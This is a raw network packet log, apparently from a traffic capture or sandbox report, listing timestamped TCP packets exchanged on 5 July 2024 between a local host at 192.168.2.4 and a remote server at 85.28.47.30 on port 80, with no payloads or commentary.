                                                                Jul 5, 2024 04:36:08.165215015 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.165344000 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.165355921 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.165395021 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.166019917 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.166075945 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.166140079 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.166196108 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.166271925 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.166321039 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.166457891 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.166513920 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.166663885 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.166676044 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.166717052 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.167419910 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.167464018 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.167551994 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.167619944 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.167836905 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.167848110 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.167889118 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.168242931 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.168292046 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.168366909 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.168411970 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.168673992 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.168684959 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.168726921 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.168740034 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.168812037 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.168823004 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.168863058 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.169756889 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.169773102 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.169784069 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.169796944 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.169806004 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.169806004 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.169820070 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.169821024 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.169833899 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.169842958 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.169855118 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.169872046 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.169879913 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.246098995 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.246114016 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.246134043 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.246145964 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.246159077 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.246170044 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.246171951 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.246185064 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.246206999 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.246207952 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.246221066 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.246221066 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.246232986 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.246247053 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.246251106 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.246263981 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.246270895 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.246273994 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.246288061 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.246300936 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.246304035 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.246315002 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.246320009 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.246344090 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.246365070 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.246408939 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.246421099 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.246432066 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.246443987 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.246454000 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.246481895 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.246526957 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.246537924 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.246547937 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.246558905 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.246567011 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.246572018 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.246579885 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.246614933 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.246617079 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.246638060 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.246649027 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.246659040 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.246659040 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.246670008 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.246681929 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.246685028 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.246691942 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.246702909 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.246709108 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.246723890 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.246731043 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.246736050 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.246746063 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.246748924 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.246762991 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.246773005 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.246795893 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.246803045 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.246814013 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.246819973 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.246826887 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.246843100 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.246856928 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.246889114 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.246952057 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.246999025 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.247025967 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.247045994 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.247059107 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.247066021 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.247086048 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.247096062 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.247117996 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.247129917 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.247139931 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.247158051 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.247172117 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.247176886 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.247184038 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.247194052 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.247205019 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.247212887 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.247242928 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.247245073 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.247279882 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.247291088 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.247302055 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.247322083 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.247332096 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.247333050 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.247343063 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.247347116 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.247365952 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.247406006 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.247509956 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.247520924 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.247531891 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.247556925 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.247570038 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.247586012 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.247600079 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.247611046 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.247622967 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.247627974 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.247659922 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.255631924 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.255655050 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.255666971 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.255697966 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.255702019 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.255713940 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.255729914 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.255747080 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.255755901 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.255759954 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.255772114 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.255783081 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.255786896 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.255812883 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.255839109 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.255872011 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.255882025 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.255918026 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.255956888 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.255968094 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.255979061 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.255999088 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.256005049 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.256016970 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.256026983 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.256027937 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.256052971 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.256063938 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.256320000 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.256364107 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.256407976 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.256419897 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.256436110 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.256439924 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.256443024 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.256454945 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.256465912 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.256513119 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.256534100 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.256544113 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.256555080 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.256624937 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.256638050 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.256643057 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.256648064 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.256659985 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.256674051 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.256692886 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.256710052 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.256716013 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.256726980 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.256741047 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.256752968 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.256766081 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.256782055 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.256808996 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.256841898 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.256853104 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.256863117 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.256874084 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.256884098 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.256892920 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.256895065 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.256906986 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.256918907 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.256942987 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.256958961 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.256968975 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.256978989 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.257005930 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.257024050 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.257039070 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.257049084 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.257059097 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.257070065 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.257081985 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.257090092 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.257108927 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.257127047 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.257136106 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.257147074 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.257157087 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.257168055 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.257179022 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.257188082 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.257205009 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.257220030 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.257266998 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.257277966 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.257287979 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.257299900 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.257309914 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.257319927 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.257323027 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.257345915 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.257355928 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.257380009 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.257399082 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.257410049 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.257420063 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.257430077 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.257441998 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.257452965 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.257469893 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.341140985 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.341156960 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.341167927 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.341180086 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.341192961 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.341197968 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.341202974 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.341217041 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.341224909 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.341231108 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.341247082 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.341259956 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.341270924 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.341274023 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.341284037 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.341293097 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.341301918 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.341303110 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.341332912 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.341352940 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.341415882 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.341428041 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.341439009 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.341450930 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.341460943 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.341463089 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.341474056 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.341484070 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.341485977 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.341497898 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.341505051 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.341511965 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.341523886 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.341548920 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.341572046 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.341754913 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.341767073 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.341777086 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.341788054 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.341799021 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.341804028 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.341811895 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.341826916 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.341831923 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.341854095 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.341866016 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.341895103 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.341907024 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.341919899 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.341933012 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.341936111 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.341948986 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.341974020 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.342041016 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.342053890 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.342065096 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.342076063 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.342082977 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.342108965 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.342132092 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.342178106 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.342189074 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.342200041 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.342211962 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.342217922 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.342223883 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.342231989 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.342247009 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.342276096 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.368170023 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.373066902 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.547836065 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.547851086 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.547871113 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.547883034 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.547898054 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.547902107 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.547915936 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.547934055 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.547934055 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.547951937 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.547962904 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.547974110 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.547983885 CEST804973085.28.47.30192.168.2.4
